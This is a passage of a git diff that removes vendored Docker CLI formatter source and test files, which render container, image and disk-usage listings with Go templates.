for rendering using a Context -func NewContainerFormat(source string, quiet bool, size bool) Format { - switch source { - case TableFormatKey: - if quiet { - return defaultQuietFormat - } - format := defaultContainerTableFormat - if size { - format += `\t{{.Size}}` - } - return Format(format) - case RawFormatKey: - if quiet { - return `container_id: {{.ID}}` - } - format := `container_id: {{.ID}} -image: {{.Image}} -command: {{.Command}} -created_at: {{.CreatedAt}} -status: {{- pad .Status 1 0}} -names: {{.Names}} -labels: {{- pad .Labels 1 0}} -ports: {{- pad .Ports 1 0}} -` - if size { - format += `size: {{.Size}}\n` - } - return Format(format) - } - return Format(source) -} - -// ContainerWrite renders the 
context for a list of containers -func ContainerWrite(ctx Context, containers []types.Container) error { - render := func(format func(subContext subContext) error) error { - for _, container := range containers { - err := format(&containerContext{trunc: ctx.Trunc, c: container}) - if err != nil { - return err - } - } - return nil - } - return ctx.Write(&containerContext{}, render) -} - -type containerContext struct { - HeaderContext - trunc bool - c types.Container -} - -func (c *containerContext) MarshalJSON() ([]byte, error) { - return marshalJSON(c) -} - -func (c *containerContext) ID() string { - c.AddHeader(containerIDHeader) - if c.trunc { - return stringid.TruncateID(c.c.ID) - } - return c.c.ID -} - -func (c *containerContext) Names() string { - c.AddHeader(namesHeader) - names := stripNamePrefix(c.c.Names) - if c.trunc { - for _, name := range names { - if len(strings.Split(name, "/")) == 1 { - names = []string{name} - break - } - } - } - return strings.Join(names, ",") -} - -func (c *containerContext) Image() string { - c.AddHeader(imageHeader) - if c.c.Image == "" { - return "" - } - if c.trunc { - if trunc := stringid.TruncateID(c.c.ImageID); trunc == stringid.TruncateID(c.c.Image) { - return trunc - } - } - return c.c.Image -} - -func (c *containerContext) Command() string { - c.AddHeader(commandHeader) - command := c.c.Command - if c.trunc { - command = stringutils.Ellipsis(command, 20) - } - return strconv.Quote(command) -} - -func (c *containerContext) CreatedAt() string { - c.AddHeader(createdAtHeader) - return time.Unix(int64(c.c.Created), 0).String() -} - -func (c *containerContext) RunningFor() string { - c.AddHeader(runningForHeader) - createdAt := time.Unix(int64(c.c.Created), 0) - return units.HumanDuration(time.Now().UTC().Sub(createdAt)) -} - -func (c *containerContext) Ports() string { - c.AddHeader(portsHeader) - return api.DisplayablePorts(c.c.Ports) -} - -func (c *containerContext) Status() string { - c.AddHeader(statusHeader) - return 
c.c.Status -} - -func (c *containerContext) Size() string { - c.AddHeader(sizeHeader) - srw := units.HumanSizeWithPrecision(float64(c.c.SizeRw), 3) - sv := units.HumanSizeWithPrecision(float64(c.c.SizeRootFs), 3) - - sf := srw - if c.c.SizeRootFs > 0 { - sf = fmt.Sprintf("%s (virtual %s)", srw, sv) - } - return sf -} - -func (c *containerContext) Labels() string { - c.AddHeader(labelsHeader) - if c.c.Labels == nil { - return "" - } - - var joinLabels []string - for k, v := range c.c.Labels { - joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) - } - return strings.Join(joinLabels, ",") -} - -func (c *containerContext) Label(name string) string { - n := strings.Split(name, ".") - r := strings.NewReplacer("-", " ", "_", " ") - h := r.Replace(n[len(n)-1]) - - c.AddHeader(h) - - if c.c.Labels == nil { - return "" - } - return c.c.Labels[name] -} - -func (c *containerContext) Mounts() string { - c.AddHeader(mountsHeader) - - var name string - var mounts []string - for _, m := range c.c.Mounts { - if m.Name == "" { - name = m.Source - } else { - name = m.Name - } - if c.trunc { - name = stringutils.Ellipsis(name, 15) - } - mounts = append(mounts, name) - } - return strings.Join(mounts, ",") -} - -func (c *containerContext) LocalVolumes() string { - c.AddHeader(localVolumes) - - count := 0 - for _, m := range c.c.Mounts { - if m.Driver == "local" { - count++ - } - } - - return fmt.Sprintf("%d", count) -} - -func (c *containerContext) Networks() string { - c.AddHeader(networksHeader) - - if c.c.NetworkSettings == nil { - return "" - } - - networks := []string{} - for k := range c.c.NetworkSettings.Networks { - networks = append(networks, k) - } - - return strings.Join(networks, ",") -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go deleted file mode 100644 index 16137897b9..0000000000 --- 
a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go +++ /dev/null @@ -1,398 +0,0 @@ -package formatter - -import ( - "bytes" - "encoding/json" - "fmt" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestContainerPsContext(t *testing.T) { - containerID := stringid.GenerateRandomID() - unix := time.Now().Add(-65 * time.Second).Unix() - - var ctx containerContext - cases := []struct { - container types.Container - trunc bool - expValue string - expHeader string - call func() string - }{ - {types.Container{ID: containerID}, true, stringid.TruncateID(containerID), containerIDHeader, ctx.ID}, - {types.Container{ID: containerID}, false, containerID, containerIDHeader, ctx.ID}, - {types.Container{Names: []string{"/foobar_baz"}}, true, "foobar_baz", namesHeader, ctx.Names}, - {types.Container{Image: "ubuntu"}, true, "ubuntu", imageHeader, ctx.Image}, - {types.Container{Image: "verylongimagename"}, true, "verylongimagename", imageHeader, ctx.Image}, - {types.Container{Image: "verylongimagename"}, false, "verylongimagename", imageHeader, ctx.Image}, - {types.Container{ - Image: "a5a665ff33eced1e0803148700880edab4", - ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", - }, - true, - "a5a665ff33ec", - imageHeader, - ctx.Image, - }, - {types.Container{ - Image: "a5a665ff33eced1e0803148700880edab4", - ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", - }, - false, - "a5a665ff33eced1e0803148700880edab4", - imageHeader, - ctx.Image, - }, - {types.Container{Image: ""}, true, "", imageHeader, ctx.Image}, - {types.Container{Command: "sh -c 'ls -la'"}, true, `"sh -c 'ls -la'"`, commandHeader, ctx.Command}, - {types.Container{Created: unix}, true, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, - {types.Container{Ports: []types.Port{{PrivatePort: 8080, PublicPort: 8080, 
Type: "tcp"}}}, true, "8080/tcp", portsHeader, ctx.Ports}, - {types.Container{Status: "RUNNING"}, true, "RUNNING", statusHeader, ctx.Status}, - {types.Container{SizeRw: 10}, true, "10 B", sizeHeader, ctx.Size}, - {types.Container{SizeRw: 10, SizeRootFs: 20}, true, "10 B (virtual 20 B)", sizeHeader, ctx.Size}, - {types.Container{}, true, "", labelsHeader, ctx.Labels}, - {types.Container{Labels: map[string]string{"cpu": "6", "storage": "ssd"}}, true, "cpu=6,storage=ssd", labelsHeader, ctx.Labels}, - {types.Container{Created: unix}, true, "About a minute", runningForHeader, ctx.RunningFor}, - {types.Container{ - Mounts: []types.MountPoint{ - { - Name: "this-is-a-long-volume-name-and-will-be-truncated-if-trunc-is-set", - Driver: "local", - Source: "/a/path", - }, - }, - }, true, "this-is-a-lo...", mountsHeader, ctx.Mounts}, - {types.Container{ - Mounts: []types.MountPoint{ - { - Driver: "local", - Source: "/a/path", - }, - }, - }, false, "/a/path", mountsHeader, ctx.Mounts}, - {types.Container{ - Mounts: []types.MountPoint{ - { - Name: "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", - Driver: "local", - Source: "/a/path", - }, - }, - }, false, "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", mountsHeader, ctx.Mounts}, - } - - for _, c := range cases { - ctx = containerContext{c: c.container, trunc: c.trunc} - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } - - c1 := types.Container{Labels: map[string]string{"com.docker.swarm.swarm-id": "33", "com.docker.swarm.node_name": "ubuntu"}} - ctx = containerContext{c: c1, trunc: true} - - sid := ctx.Label("com.docker.swarm.swarm-id") - node := ctx.Label("com.docker.swarm.node_name") - if sid != "33" { - t.Fatalf("Expected 33, was %s\n", sid) - } - - if node 
!= "ubuntu" { - t.Fatalf("Expected ubuntu, was %s\n", node) - } - - h := ctx.FullHeader() - if h != "SWARM ID\tNODE NAME" { - t.Fatalf("Expected %s, was %s\n", "SWARM ID\tNODE NAME", h) - - } - - c2 := types.Container{} - ctx = containerContext{c: c2, trunc: true} - - label := ctx.Label("anything.really") - if label != "" { - t.Fatalf("Expected an empty string, was %s", label) - } - - ctx = containerContext{c: c2, trunc: true} - FullHeader := ctx.FullHeader() - if FullHeader != "" { - t.Fatalf("Expected FullHeader to be empty, was %s", FullHeader) - } - -} - -func TestContainerContextWrite(t *testing.T) { - unixTime := time.Now().AddDate(0, 0, -1).Unix() - expectedTime := time.Unix(unixTime, 0).String() - - cases := []struct { - context Context - expected string - }{ - // Errors - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table Format - { - Context{Format: NewContainerFormat("table", false, true)}, - `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES SIZE -containerID1 ubuntu "" 24 hours ago foobar_baz 0 B -containerID2 ubuntu "" 24 hours ago foobar_bar 0 B -`, - }, - { - Context{Format: NewContainerFormat("table", false, false)}, - `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -containerID1 ubuntu "" 24 hours ago foobar_baz -containerID2 ubuntu "" 24 hours ago foobar_bar -`, - }, - { - Context{Format: NewContainerFormat("table {{.Image}}", false, false)}, - "IMAGE\nubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("table {{.Image}}", false, true)}, - "IMAGE\nubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("table {{.Image}}", true, false)}, - "IMAGE\nubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("table", true, false)}, - "containerID1\ncontainerID2\n", - }, - // Raw Format - { - 
Context{Format: NewContainerFormat("raw", false, false)}, - fmt.Sprintf(`container_id: containerID1 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_baz -labels: -ports: - -container_id: containerID2 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_bar -labels: -ports: - -`, expectedTime, expectedTime), - }, - { - Context{Format: NewContainerFormat("raw", false, true)}, - fmt.Sprintf(`container_id: containerID1 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_baz -labels: -ports: -size: 0 B - -container_id: containerID2 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_bar -labels: -ports: -size: 0 B - -`, expectedTime, expectedTime), - }, - { - Context{Format: NewContainerFormat("raw", true, false)}, - "container_id: containerID1\ncontainer_id: containerID2\n", - }, - // Custom Format - { - Context{Format: "{{.Image}}"}, - "ubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("{{.Image}}", false, true)}, - "ubuntu\nubuntu\n", - }, - } - - for _, testcase := range cases { - containers := []types.Container{ - {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unixTime}, - {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unixTime}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := ContainerWrite(testcase.context, containers) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestContainerContextWriteWithNoContainers(t *testing.T) { - out := bytes.NewBufferString("") - containers := []types.Container{} - - contexts := []struct { - context Context - expected string - }{ - { - Context{ - Format: "{{.Image}}", - Output: out, - }, - "", - }, - { - Context{ - Format: "table {{.Image}}", - Output: out, - }, - "IMAGE\n", - }, - { - Context{ - Format: NewContainerFormat("{{.Image}}", false, true), - Output: out, - 
}, - "", - }, - { - Context{ - Format: NewContainerFormat("table {{.Image}}", false, true), - Output: out, - }, - "IMAGE\n", - }, - { - Context{ - Format: "table {{.Image}}\t{{.Size}}", - Output: out, - }, - "IMAGE SIZE\n", - }, - { - Context{ - Format: NewContainerFormat("table {{.Image}}\t{{.Size}}", false, true), - Output: out, - }, - "IMAGE SIZE\n", - }, - } - - for _, context := range contexts { - ContainerWrite(context.context, containers) - assert.Equal(t, context.expected, out.String()) - // Clean buffer - out.Reset() - } -} - -func TestContainerContextWriteJSON(t *testing.T) { - unix := time.Now().Add(-65 * time.Second).Unix() - containers := []types.Container{ - {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unix}, - {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unix}, - } - expectedCreated := time.Unix(unix, 0).String() - expectedJSONs := []map[string]interface{}{ - {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID1", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_baz", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, - {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID2", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_bar", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, - } - out := bytes.NewBufferString("") - err := ContainerWrite(Context{Format: "{{json .}}", Output: out}, containers) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var m map[string]interface{} - if err := json.Unmarshal([]byte(line), &m); err != nil { - t.Fatal(err) - } - assert.DeepEqual(t, m, expectedJSONs[i]) - } -} - -func TestContainerContextWriteJSONField(t *testing.T) { - containers := []types.Container{ - {ID: 
"containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu"}, - {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu"}, - } - out := bytes.NewBufferString("") - err := ContainerWrite(Context{Format: "{{json .ID}}", Output: out}, containers) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var s string - if err := json.Unmarshal([]byte(line), &s); err != nil { - t.Fatal(err) - } - assert.Equal(t, s, containers[i].ID) - } -} - -func TestContainerBackCompat(t *testing.T) { - containers := []types.Container{{ID: "brewhaha"}} - cases := []string{ - "ID", - "Names", - "Image", - "Command", - "CreatedAt", - "RunningFor", - "Ports", - "Status", - "Size", - "Labels", - "Mounts", - } - buf := bytes.NewBuffer(nil) - for _, c := range cases { - ctx := Context{Format: Format(fmt.Sprintf("{{ .%s }}", c)), Output: buf} - if err := ContainerWrite(ctx, containers); err != nil { - t.Logf("could not render template for field '%s': %v", c, err) - t.Fail() - } - buf.Reset() - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom.go b/vendor/github.com/docker/docker/cli/command/formatter/custom.go deleted file mode 100644 index df32684429..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/custom.go +++ /dev/null @@ -1,51 +0,0 @@ -package formatter - -import ( - "strings" -) - -const ( - imageHeader = "IMAGE" - createdSinceHeader = "CREATED" - createdAtHeader = "CREATED AT" - sizeHeader = "SIZE" - labelsHeader = "LABELS" - nameHeader = "NAME" - driverHeader = "DRIVER" - scopeHeader = "SCOPE" -) - -type subContext interface { - FullHeader() string - AddHeader(header string) -} - -// HeaderContext provides the subContext interface for managing headers -type HeaderContext struct { - header []string -} - -// FullHeader returns the header as a string -func (c *HeaderContext) FullHeader() string { - if c.header == nil { - 
return "" - } - return strings.Join(c.header, "\t") -} - -// AddHeader adds another column to the header -func (c *HeaderContext) AddHeader(header string) { - if c.header == nil { - c.header = []string{} - } - c.header = append(c.header, strings.ToUpper(header)) -} - -func stripNamePrefix(ss []string) []string { - sss := make([]string, len(ss)) - for i, s := range ss { - sss[i] = s[1:] - } - - return sss -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go deleted file mode 100644 index da42039dca..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go +++ /dev/null @@ -1,28 +0,0 @@ -package formatter - -import ( - "reflect" - "strings" - "testing" -) - -func compareMultipleValues(t *testing.T, value, expected string) { - // comma-separated values means probably a map input, which won't - // be guaranteed to have the same order as our expected value - // We'll create maps and use reflect.DeepEquals to check instead: - entriesMap := make(map[string]string) - expMap := make(map[string]string) - entries := strings.Split(value, ",") - expectedEntries := strings.Split(expected, ",") - for _, entry := range entries { - keyval := strings.Split(entry, "=") - entriesMap[keyval[0]] = keyval[1] - } - for _, expected := range expectedEntries { - keyval := strings.Split(expected, "=") - expMap[keyval[0]] = keyval[1] - } - if !reflect.DeepEqual(expMap, entriesMap) { - t.Fatalf("Expected entries: %v, got: %v", expected, value) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go deleted file mode 100644 index 5309d880a5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go +++ /dev/null @@ -1,334 +0,0 @@ -package formatter - -import ( - "bytes" - "fmt" - "strings" - "text/template" - - 
"github.com/docker/distribution/reference" - "github.com/docker/docker/api/types" - units "github.com/docker/go-units" -) - -const ( - defaultDiskUsageImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.VirtualSize}}\t{{.SharedSize}}\t{{.UniqueSize}}\t{{.Containers}}" - defaultDiskUsageContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.LocalVolumes}}\t{{.Size}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Names}}" - defaultDiskUsageVolumeTableFormat = "table {{.Name}}\t{{.Links}}\t{{.Size}}" - defaultDiskUsageTableFormat = "table {{.Type}}\t{{.TotalCount}}\t{{.Active}}\t{{.Size}}\t{{.Reclaimable}}" - - typeHeader = "TYPE" - totalHeader = "TOTAL" - activeHeader = "ACTIVE" - reclaimableHeader = "RECLAIMABLE" - containersHeader = "CONTAINERS" - sharedSizeHeader = "SHARED SIZE" - uniqueSizeHeader = "UNIQUE SiZE" -) - -// DiskUsageContext contains disk usage specific information required by the formater, encapsulate a Context struct. -type DiskUsageContext struct { - Context - Verbose bool - LayersSize int64 - Images []*types.ImageSummary - Containers []*types.Container - Volumes []*types.Volume -} - -func (ctx *DiskUsageContext) startSubsection(format string) (*template.Template, error) { - ctx.buffer = bytes.NewBufferString("") - ctx.header = "" - ctx.Format = Format(format) - ctx.preFormat() - - return ctx.parseFormat() -} - -func (ctx *DiskUsageContext) Write() { - if ctx.Verbose == false { - ctx.buffer = bytes.NewBufferString("") - ctx.Format = defaultDiskUsageTableFormat - ctx.preFormat() - - tmpl, err := ctx.parseFormat() - if err != nil { - return - } - - err = ctx.contextFormat(tmpl, &diskUsageImagesContext{ - totalSize: ctx.LayersSize, - images: ctx.Images, - }) - if err != nil { - return - } - err = ctx.contextFormat(tmpl, &diskUsageContainersContext{ - containers: ctx.Containers, - }) - if err != nil { - return - } - - err = ctx.contextFormat(tmpl, &diskUsageVolumesContext{ - volumes: ctx.Volumes, - }) - if err 
!= nil { - return - } - - ctx.postFormat(tmpl, &diskUsageContainersContext{containers: []*types.Container{}}) - - return - } - - // First images - tmpl, err := ctx.startSubsection(defaultDiskUsageImageTableFormat) - if err != nil { - return - } - - ctx.Output.Write([]byte("Images space usage:\n\n")) - for _, i := range ctx.Images { - repo := "" - tag := "" - if len(i.RepoTags) > 0 && !isDangling(*i) { - // Only show the first tag - ref, err := reference.ParseNamed(i.RepoTags[0]) - if err != nil { - continue - } - if nt, ok := ref.(reference.NamedTagged); ok { - repo = ref.Name() - tag = nt.Tag() - } - } - - err = ctx.contextFormat(tmpl, &imageContext{ - repo: repo, - tag: tag, - trunc: true, - i: *i, - }) - if err != nil { - return - } - } - ctx.postFormat(tmpl, &imageContext{}) - - // Now containers - ctx.Output.Write([]byte("\nContainers space usage:\n\n")) - tmpl, err = ctx.startSubsection(defaultDiskUsageContainerTableFormat) - if err != nil { - return - } - for _, c := range ctx.Containers { - // Don't display the virtual size - c.SizeRootFs = 0 - err = ctx.contextFormat(tmpl, &containerContext{ - trunc: true, - c: *c, - }) - if err != nil { - return - } - } - ctx.postFormat(tmpl, &containerContext{}) - - // And volumes - ctx.Output.Write([]byte("\nLocal Volumes space usage:\n\n")) - tmpl, err = ctx.startSubsection(defaultDiskUsageVolumeTableFormat) - if err != nil { - return - } - for _, v := range ctx.Volumes { - err = ctx.contextFormat(tmpl, &volumeContext{ - v: *v, - }) - if err != nil { - return - } - } - ctx.postFormat(tmpl, &volumeContext{v: types.Volume{}}) -} - -type diskUsageImagesContext struct { - HeaderContext - totalSize int64 - images []*types.ImageSummary -} - -func (c *diskUsageImagesContext) Type() string { - c.AddHeader(typeHeader) - return "Images" -} - -func (c *diskUsageImagesContext) TotalCount() string { - c.AddHeader(totalHeader) - return fmt.Sprintf("%d", len(c.images)) -} - -func (c *diskUsageImagesContext) Active() string { - 
c.AddHeader(activeHeader) - used := 0 - for _, i := range c.images { - if i.Containers > 0 { - used++ - } - } - - return fmt.Sprintf("%d", used) -} - -func (c *diskUsageImagesContext) Size() string { - c.AddHeader(sizeHeader) - return units.HumanSize(float64(c.totalSize)) - -} - -func (c *diskUsageImagesContext) Reclaimable() string { - var used int64 - - c.AddHeader(reclaimableHeader) - for _, i := range c.images { - if i.Containers != 0 { - if i.VirtualSize == -1 || i.SharedSize == -1 { - continue - } - used += i.VirtualSize - i.SharedSize - } - } - - reclaimable := c.totalSize - used - if c.totalSize > 0 { - return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/c.totalSize) - } - return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) -} - -type diskUsageContainersContext struct { - HeaderContext - verbose bool - containers []*types.Container -} - -func (c *diskUsageContainersContext) Type() string { - c.AddHeader(typeHeader) - return "Containers" -} - -func (c *diskUsageContainersContext) TotalCount() string { - c.AddHeader(totalHeader) - return fmt.Sprintf("%d", len(c.containers)) -} - -func (c *diskUsageContainersContext) isActive(container types.Container) bool { - return strings.Contains(container.State, "running") || - strings.Contains(container.State, "paused") || - strings.Contains(container.State, "restarting") -} - -func (c *diskUsageContainersContext) Active() string { - c.AddHeader(activeHeader) - used := 0 - for _, container := range c.containers { - if c.isActive(*container) { - used++ - } - } - - return fmt.Sprintf("%d", used) -} - -func (c *diskUsageContainersContext) Size() string { - var size int64 - - c.AddHeader(sizeHeader) - for _, container := range c.containers { - size += container.SizeRw - } - - return units.HumanSize(float64(size)) -} - -func (c *diskUsageContainersContext) Reclaimable() string { - var reclaimable int64 - var totalSize int64 - - c.AddHeader(reclaimableHeader) - for _, container 
:= range c.containers { - if !c.isActive(*container) { - reclaimable += container.SizeRw - } - totalSize += container.SizeRw - } - - if totalSize > 0 { - return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) - } - - return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) -} - -type diskUsageVolumesContext struct { - HeaderContext - verbose bool - volumes []*types.Volume -} - -func (c *diskUsageVolumesContext) Type() string { - c.AddHeader(typeHeader) - return "Local Volumes" -} - -func (c *diskUsageVolumesContext) TotalCount() string { - c.AddHeader(totalHeader) - return fmt.Sprintf("%d", len(c.volumes)) -} - -func (c *diskUsageVolumesContext) Active() string { - c.AddHeader(activeHeader) - - used := 0 - for _, v := range c.volumes { - if v.UsageData.RefCount > 0 { - used++ - } - } - - return fmt.Sprintf("%d", used) -} - -func (c *diskUsageVolumesContext) Size() string { - var size int64 - - c.AddHeader(sizeHeader) - for _, v := range c.volumes { - if v.UsageData.Size != -1 { - size += v.UsageData.Size - } - } - - return units.HumanSize(float64(size)) -} - -func (c *diskUsageVolumesContext) Reclaimable() string { - var reclaimable int64 - var totalSize int64 - - c.AddHeader(reclaimableHeader) - for _, v := range c.volumes { - if v.UsageData.Size != -1 { - if v.UsageData.RefCount == 0 { - reclaimable += v.UsageData.Size - } - totalSize += v.UsageData.Size - } - } - - if totalSize > 0 { - return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) - } - - return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go deleted file mode 100644 index e859a1ca26..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go +++ /dev/null @@ -1,123 +0,0 @@ -package formatter - -import ( - "bytes" - "fmt" - 
"io" - "strings" - "text/tabwriter" - "text/template" - - "github.com/docker/docker/utils/templates" -) - -// Format keys used to specify certain kinds of output formats -const ( - TableFormatKey = "table" - RawFormatKey = "raw" - PrettyFormatKey = "pretty" - - defaultQuietFormat = "{{.ID}}" -) - -// Format is the format string rendered using the Context -type Format string - -// IsTable returns true if the format is a table-type format -func (f Format) IsTable() bool { - return strings.HasPrefix(string(f), TableFormatKey) -} - -// Contains returns true if the format contains the substring -func (f Format) Contains(sub string) bool { - return strings.Contains(string(f), sub) -} - -// Context contains information required by the formatter to print the output as desired. -type Context struct { - // Output is the output stream to which the formatted string is written. - Output io.Writer - // Format is used to choose raw, table or custom format for the output. - Format Format - // Trunc when set to true will truncate the output of certain fields such as Container ID. 
- Trunc bool - - // internal element - finalFormat string - header string - buffer *bytes.Buffer -} - -func (c *Context) preFormat() { - c.finalFormat = string(c.Format) - - // TODO: handle this in the Format type - if c.Format.IsTable() { - c.finalFormat = c.finalFormat[len(TableFormatKey):] - } - - c.finalFormat = strings.Trim(c.finalFormat, " ") - r := strings.NewReplacer(`\t`, "\t", `\n`, "\n") - c.finalFormat = r.Replace(c.finalFormat) -} - -func (c *Context) parseFormat() (*template.Template, error) { - tmpl, err := templates.Parse(c.finalFormat) - if err != nil { - return tmpl, fmt.Errorf("Template parsing error: %v\n", err) - } - return tmpl, err -} - -func (c *Context) postFormat(tmpl *template.Template, subContext subContext) { - if c.Format.IsTable() { - if len(c.header) == 0 { - // if we still don't have a header, we didn't have any containers so we need to fake it to get the right headers from the template - tmpl.Execute(bytes.NewBufferString(""), subContext) - c.header = subContext.FullHeader() - } - - t := tabwriter.NewWriter(c.Output, 20, 1, 3, ' ', 0) - t.Write([]byte(c.header)) - t.Write([]byte("\n")) - c.buffer.WriteTo(t) - t.Flush() - } else { - c.buffer.WriteTo(c.Output) - } -} - -func (c *Context) contextFormat(tmpl *template.Template, subContext subContext) error { - if err := tmpl.Execute(c.buffer, subContext); err != nil { - return fmt.Errorf("Template parsing error: %v\n", err) - } - if c.Format.IsTable() && len(c.header) == 0 { - c.header = subContext.FullHeader() - } - c.buffer.WriteString("\n") - return nil -} - -// SubFormat is a function type accepted by Write() -type SubFormat func(func(subContext) error) error - -// Write the template to the buffer using this Context -func (c *Context) Write(sub subContext, f SubFormat) error { - c.buffer = bytes.NewBufferString("") - c.preFormat() - - tmpl, err := c.parseFormat() - if err != nil { - return err - } - - subFormat := func(subContext subContext) error { - return c.contextFormat(tmpl, 
subContext) - } - if err := f(subFormat); err != nil { - return err - } - - c.postFormat(tmpl, sub) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image.go b/vendor/github.com/docker/docker/cli/command/formatter/image.go deleted file mode 100644 index 5c7de826f0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/image.go +++ /dev/null @@ -1,259 +0,0 @@ -package formatter - -import ( - "fmt" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" - units "github.com/docker/go-units" -) - -const ( - defaultImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" - defaultImageTableFormatWithDigest = "table {{.Repository}}\t{{.Tag}}\t{{.Digest}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" - - imageIDHeader = "IMAGE ID" - repositoryHeader = "REPOSITORY" - tagHeader = "TAG" - digestHeader = "DIGEST" -) - -// ImageContext contains image specific information required by the formater, encapsulate a Context struct. 
-type ImageContext struct { - Context - Digest bool -} - -func isDangling(image types.ImageSummary) bool { - return len(image.RepoTags) == 1 && image.RepoTags[0] == ":" && len(image.RepoDigests) == 1 && image.RepoDigests[0] == "@" -} - -// NewImageFormat returns a format for rendering an ImageContext -func NewImageFormat(source string, quiet bool, digest bool) Format { - switch source { - case TableFormatKey: - switch { - case quiet: - return defaultQuietFormat - case digest: - return defaultImageTableFormatWithDigest - default: - return defaultImageTableFormat - } - case RawFormatKey: - switch { - case quiet: - return `image_id: {{.ID}}` - case digest: - return `repository: {{ .Repository }} -tag: {{.Tag}} -digest: {{.Digest}} -image_id: {{.ID}} -created_at: {{.CreatedAt}} -virtual_size: {{.Size}} -` - default: - return `repository: {{ .Repository }} -tag: {{.Tag}} -image_id: {{.ID}} -created_at: {{.CreatedAt}} -virtual_size: {{.Size}} -` - } - } - - format := Format(source) - if format.IsTable() && digest && !format.Contains("{{.Digest}}") { - format += "\t{{.Digest}}" - } - return format -} - -// ImageWrite writes the formatter images using the ImageContext -func ImageWrite(ctx ImageContext, images []types.ImageSummary) error { - render := func(format func(subContext subContext) error) error { - return imageFormat(ctx, images, format) - } - return ctx.Write(&imageContext{}, render) -} - -func imageFormat(ctx ImageContext, images []types.ImageSummary, format func(subContext subContext) error) error { - for _, image := range images { - images := []*imageContext{} - if isDangling(image) { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: "", - tag: "", - digest: "", - }) - } else { - repoTags := map[string][]string{} - repoDigests := map[string][]string{} - - for _, refString := range 